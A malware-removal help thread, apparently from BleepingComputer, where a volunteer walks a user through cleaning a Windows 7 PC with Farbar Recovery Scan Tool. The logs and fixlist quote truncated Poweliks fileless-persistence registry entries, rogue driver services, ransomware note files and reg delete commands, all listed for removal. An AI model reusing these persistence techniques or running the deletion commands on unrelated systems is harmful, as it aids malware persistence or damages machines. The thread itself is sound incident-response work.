AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/09/2014 11:10:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1fb0
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 09:49:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x1f14
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 08:35:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1b04
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 07:45:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0xba8
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 07:20:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc6
Faulting process id: 0x15bc
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 07:00:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x1134
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 04:59:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x10f0
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 04:50:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x14b8
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
 
System errors:
=============
Error: (09/10/2014 05:35:01 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/10/2014 03:24:05 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.183.2032.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.5.0216.00
 
Source Path: 4.5.0216.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (09/10/2014 03:03:53 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Microsoft Office PowerPoint 2007 (KB2596764).
 
Error: (09/10/2014 03:03:53 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x8024200d: Windows 7 Service Pack 1 (KB976932).
 
Error: (09/09/2014 03:11:29 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/09/2014 02:59:31 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/09/2014 02:40:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
 
Microsoft Office Sessions:
=========================
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/09/2014 11:10:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005000000001fb001cfcc3d9471c32eC:\windows\System32\svchost.exeunknown67e612c7-3833-11e4-9616-00266c867412
 
Error: (09/09/2014 09:49:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc91f1401cfcc333df3f2d2C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll28febcec-3828-11e4-9616-00266c867412
 
Error: (09/09/2014 08:35:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005000000001b0401cfcc23987382a3C:\windows\System32\svchost.exeunknownd28b6b52-381d-11e4-9616-00266c867412
 
Error: (09/09/2014 07:45:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9ba801cfcc203e1fd0a5C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllc4844b3b-3816-11e4-9616-00266c867412
 
Error: (09/09/2014 07:20:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc615bc01cfcc1d4f1638b6C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll3e1a6336-3813-11e4-9616-00266c867412
 
Error: (09/09/2014 07:00:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9113401cfcc14ed3ddaf3C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll7429f071-3810-11e4-9616-00266c867412
 
Error: (09/09/2014 04:59:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc910f001cfcc0b25b921e2C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll9777e03b-37ff-11e4-9616-00266c867412
 
Error: (09/09/2014 04:50:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc914b801cfcc087e252df8C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll534e5815-37fe-11e4-9616-00266c867412
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-21 08:59:48.259
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.229
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.179
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.139
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.049
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.999
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.959
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 62%
Total physical RAM: 3061.86 MB
Available physical RAM: 1138.73 MB
Total Pagefile: 6122 MB
Available Pagefile: 3892.45 MB
Total Virtual: 2047.88 MB
Available Virtual: 1894.05 MB
 
==================== Drives ================================
 
Drive c: (S3A8572D009) (Fixed) (Total:583.02 GB) (Free:540.74 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 9BD1B9BA)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=583 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=17)
 
==================== End Of Log ============================


Yeah, so I was getting error messages whenever I tried to post the thread. So I just kept trying. That was stupid. My bad, I've reported all my own threads.
Mod Edit:  I deleted all duplicates - Hamluis.

 

Edited by hamluis, 10 September 2014 - 07:00 AM.



 


#2 olgun52

olgun52

  • Malware Response Team

Posted 10 September 2014 - 08:22 AM

Hello tantryl and welcome to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

 

My name is Yılmaz and I'll help you with the cleanup of malware from your computer.

Before we move on, please read the following points carefully.
 

  • Please complete all steps in the specified order.
  • Even if tools don't find malware, I want you to post the logfiles anyway.
  • Please copy and paste the logfiles directly into your posts. Please do not attach them unless you are instructed to do so.
  • Read the instructions carefully. If you have problems, stop what you were doing and describe the problems you encountered as precisely as you can.
  • Don't install or uninstall software during the cleanup unless you are told to do so.
  • If you can't answer for the next few days, please let me know. If you haven't answered within 5 days, I am assuming that you don't need help anymore and your topic will be closed.
  • I can not guarantee that we will find and be able to remove all malware. The cleaning process is not instant. Please continue to review my answers until I tell you that your computer is clean.
  • Please reply to this thread. Do not start a new topic
  • As my first language is not English, please do not use slang or idioms. It could be hard for me to understand.

 

  • Please open the computer as administrator. How do I open the computer as administrator?
  • Disable your AntiVirus and AntiSpyware applications, as they will interfere with our tools and the removal. If you are unsure how to do this, please refer to the help here.

Thanks

 

---------------------------------------------------------------------------------------------------------------------------

 

I am currently reviewing your log. I will be back with a fix for your problem as soon as possible. Please be patient with me during this time.

 

 

Best regards


Edited by olgun52, 10 September 2014 - 08:24 AM.

Best regards
 
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#3 olgun52

olgun52

  • Malware Response Team

Posted 10 September 2014 - 10:52 AM

Hello tantryl,

 

Please run the following for me.

Farbar's Recovery Scan Tool
For this step you will need a USB flash drive.

  • Press the Windows key + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it on the flashdrive as fixlist.txt
start
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
S1 ajvytjcn; \??\C:\windows\system32\drivers\ajvytjcn.sys [X]
S1 ezgvvduv; \??\C:\windows\system32\drivers\ezgvvduv.sys [X]
S1 hijfosmh; \??\C:\windows\system32\drivers\hijfosmh.sys [X]
S1 ivhuifer; \??\C:\windows\system32\drivers\ivhuifer.sys [X]
S1 kmsjshbz; \??\C:\windows\system32\drivers\kmsjshbz.sys [X]
S1 lnsgscfl; \??\C:\windows\system32\drivers\lnsgscfl.sys [X]
S1 pluzxczp; \??\C:\windows\system32\drivers\pluzxczp.sys [X]
S1 qozzqzgr; \??\C:\windows\system32\drivers\qozzqzgr.sys [X]
S3 Tosrfcom; No ImagePath
FF Plugin: @microsoft.com/GENUINE -> disabled No File
C:\Users\hesperia\AppData\Roaming\Awyhvya
C:\Users\hesperia\AppData\Roaming\Usleabo
C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
C:\ProgramData\DECRYPT_INSTRUCTION.HTML
C:\ProgramData\DECRYPT_INSTRUCTION.TXT
C:\ProgramData\DECRYPT_INSTRUCTION.URL
C:\Users\hesperia\AppData\Roaming\sRaiGGih
C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
deletekey: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /ve /f
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /v a /f
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
EmptyTemp:
end
  • Plug the flashdrive into the infected PC and follow the 2 step process below to enter the System Recovery Options using one of the three options listed, then run Farbar's Recovery Scan Tool

----------

Entering into the System Recovery Options

Option 1

To enter System Recovery Options in Windows 8:

Option 2

To enter System Recovery Options from the Advanced Boot Options:

  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

Option 3

To enter System Recovery Options by using Windows installation disc:

  • Insert the installation disc.
  • Restart your computer.
  • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
  • Click Repair your computer.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next

----------

Running Farbar's Recovery Scan Tool in System Recovery

  • Once you are in the System Recovery Options menu you will get the following options:

Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt

  • Select Command Prompt
  • In the command window type in Notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select Computer and find your flash drive letter and close the notepad.
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    • Note: Replace letter e with the drive letter of your flash drive.
  • When the tool opens click Yes to disclaimer.
  • Press Fix button.
  • It will make a log (fixlog.txt) on the flash drive. Please copy and paste it to your reply.
  • Attempt to reboot your computer into Normal (or Safe) Mode and check the performance
  • If you are able to boot, rerun FRST making sure to place a check mark in Addition.txt

*****************************************************************************

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.

  • Does your computer boot properly?
  • FRST report(s)

 

Best regards.

 



 


 


#4 tantryl

tantryl
  • Topic Starter

  • Members

Posted 11 September 2014 - 12:16 AM

Thanks olgun52. I'm not in front of the PC (you probably saw TeamViewer in the process list) but can be either in a few hours or tomorrow so I'll do that then and report back.



#5 olgun52

olgun52

  • Malware Response Team

Posted 11 September 2014 - 04:54 AM

OK. Thank you for the information.

 

Have a nice day.



 


 


#6 tantryl

tantryl
  • Topic Starter

  • Members

Posted 12 September 2014 - 02:19 AM

Looks a lot better although the last two things in "Registry (Whitelisted)" seem bad to me. Probably worth noting: although I asked them to leave the computer off they decided to use it and leave it on and on the internet. So the thing could've updated/reinstalled/whatevered itself.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 10-09-2014
Ran by SYSTEM at 2014-09-12 15:09:01 Run:1
Running from F:\
Boot Mode: Recovery
 
==============================================
 
Content of fixlist:
*****************
start
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
S1 ajvytjcn; \??\C:\windows\system32\drivers\ajvytjcn.sys [X]
S1 ezgvvduv; \??\C:\windows\system32\drivers\ezgvvduv.sys [X]
S1 hijfosmh; \??\C:\windows\system32\drivers\hijfosmh.sys [X]
S1 ivhuifer; \??\C:\windows\system32\drivers\ivhuifer.sys [X]
S1 kmsjshbz; \??\C:\windows\system32\drivers\kmsjshbz.sys [X]
S1 lnsgscfl; \??\C:\windows\system32\drivers\lnsgscfl.sys [X]
S1 pluzxczp; \??\C:\windows\system32\drivers\pluzxczp.sys [X]
S1 qozzqzgr; \??\C:\windows\system32\drivers\qozzqzgr.sys [X]
S3 Tosrfcom; No ImagePath
FF Plugin: @microsoft.com/GENUINE -> disabled No File
C:\Users\hesperia\AppData\Roaming\Awyhvya
C:\Users\hesperia\AppData\Roaming\Usleabo
C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
C:\ProgramData\DECRYPT_INSTRUCTION.HTML
C:\ProgramData\DECRYPT_INSTRUCTION.TXT
C:\ProgramData\DECRYPT_INSTRUCTION.URL
C:\Users\hesperia\AppData\Roaming\sRaiGGih
C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
deletekey: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /ve /f
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /v a /f
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
EmptyTemp:
end
*****************
 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\Software\Microsoft\Windows\CurrentVersion\Run\\.tluafed** <*> => Value could not be deleted.Error getting handle(2): -1073741772
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! => Error: The entry should be fixed outside recovery mode.
ajvytjcn => Service deleted successfully.
ezgvvduv => Service deleted successfully.
hijfosmh => Service deleted successfully.
ivhuifer => Service deleted successfully.
kmsjshbz => Service deleted successfully.
lnsgscfl => Service deleted successfully.
pluzxczp => Service deleted successfully.
qozzqzgr => Service deleted successfully.
Tosrfcom => Service deleted successfully.
FF Plugin: @microsoft.com/GENUINE -> disabled No File => Error: The entry should be fixed outside recovery mode.
C:\Users\hesperia\AppData\Roaming\Awyhvya => Moved successfully.
C:\Users\hesperia\AppData\Roaming\Usleabo => Moved successfully.
C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\hesperia\AppData\Roaming\sRaiGGih => Moved successfully.
"C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe" => File/Directory not found.
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? => Error: The entry should be fixed outside recovery mode.
HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 => Key not found.
 
========= reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /ve /f =========
 
ERROR: The system was unable to find the specified registry key or value.
 
 
========= End of Reg: =========
 
 
========= reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /v a /f =========
 
ERROR: The system was unable to find the specified registry key or value.
 
 
========= End of Reg: =========
 
C:\Users\hesperia\Documents\failure notice.eml => ":OECustomProperty" ADS removed successfully.
C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml => ":OECustomProperty" ADS removed successfully.
C:\Users\hesperia\Documents\Invites.eml => ":OECustomProperty" ADS removed successfully.
EmptyTemp: => Error: This directive works only outside recovery mode.
 
==== End of Fixlog ====
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-09-2014
Ran by hesperia (administrator) on HESPERIA-PC on 12-09-2014 15:12:54
Running from E:\
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
